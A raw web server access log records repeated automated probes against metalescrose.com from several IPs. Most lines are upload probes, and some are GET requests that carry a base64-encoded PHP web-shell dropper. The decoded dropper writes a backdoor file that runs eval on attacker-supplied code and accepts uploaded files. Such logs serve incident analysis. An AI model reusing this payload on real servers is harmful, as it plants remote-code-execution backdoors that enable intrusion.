37.52.186.2 - - [08/Nov/2025:00:30:58 +0000] "GET / HTTP/1.1" 200 1676 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0"
37.52.186.2 - - [08/Nov/2025:00:30:59 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0"
37.52.186.2 - - [08/Nov/2025:00:31:02 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0"
37.52.186.2 - - [08/Nov/2025:00:31:04 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0"
37.52.186.2 - - [08/Nov/2025:00:31:06 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0"
37.52.186.2 - - [08/Nov/2025:00:31:10 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0"
89.208.107.124 - - [08/Nov/2025:00:45:10 +0000] "GET / HTTP/1.1" 200 1676 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2903.5 Safari/537.36"
89.208.107.124 - - [08/Nov/2025:00:45:32 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2903.5 Safari/537.36"
89.208.107.124 - - [08/Nov/2025:00:45:32 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2903.5 Safari/537.36"
193.32.162.44 - - [08/Nov/2025:00:50:56 +0000] "GET / HTTP/1.1" 200 1676 "-" "python-requests/2.32.5"
193.32.162.44 - - [08/Nov/2025:00:50:57 +0000] "HEAD /readme.html HTTP/1.1" 404 0 "-" "python-requests/2.32.5"
194.68.32.71 - - [08/Nov/2025:01:00:37 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.71 - - [08/Nov/2025:01:00:46 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.71 - - [08/Nov/2025:01:00:47 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.71 - - [08/Nov/2025:01:00:47 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
193.32.162.44 - - [08/Nov/2025:00:50:56 +0000] "HEAD / HTTP/1.1" 200 0 "-" "python-requests/2.32.5"
89.208.107.124 - - [08/Nov/2025:00:45:44 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2903.5 Safari/537.36"
89.208.107.124 - - [08/Nov/2025:00:45:45 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2903.5 Safari/537.36"
89.208.107.124 - - [08/Nov/2025:00:45:46 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2903.5 Safari/537.36"
194.68.32.71 - - [08/Nov/2025:01:00:22 +0000] "GET / HTTP/1.1" 200 1676 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.71 - - [08/Nov/2025:01:00:23 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
37.52.186.2 - - [08/Nov/2025:01:16:12 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0"
45.227.253.15 - - [08/Nov/2025:01:07:34 +0000] "GET /index.php/jk HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/101.0"
37.52.186.2 - - [08/Nov/2025:01:16:24 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0"
45.227.253.15 - - [08/Nov/2025:01:07:01 +0000] "GET /f3dc2/admin.php?ARRAY=7o2230223n313736323536373837362p2231223n22687474703n5p2s5p2s7n7336363876313361732r6s65636s726573732r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736323536343237362q3062323030616162656563326430393037646333393664313565326662643038222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/101.0"
37.52.186.2 - - [08/Nov/2025:01:15:02 +0000] "GET / HTTP/1.1" 200 1676 "-" "Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0"
37.52.186.2 - - [08/Nov/2025:01:16:27 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0"
37.52.186.2 - - [08/Nov/2025:01:16:28 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0"
37.52.186.2 - - [08/Nov/2025:01:16:30 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0"
37.52.186.2 - - [08/Nov/2025:01:32:29 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:51.0) Gecko/20100101 Firefox/51.0"
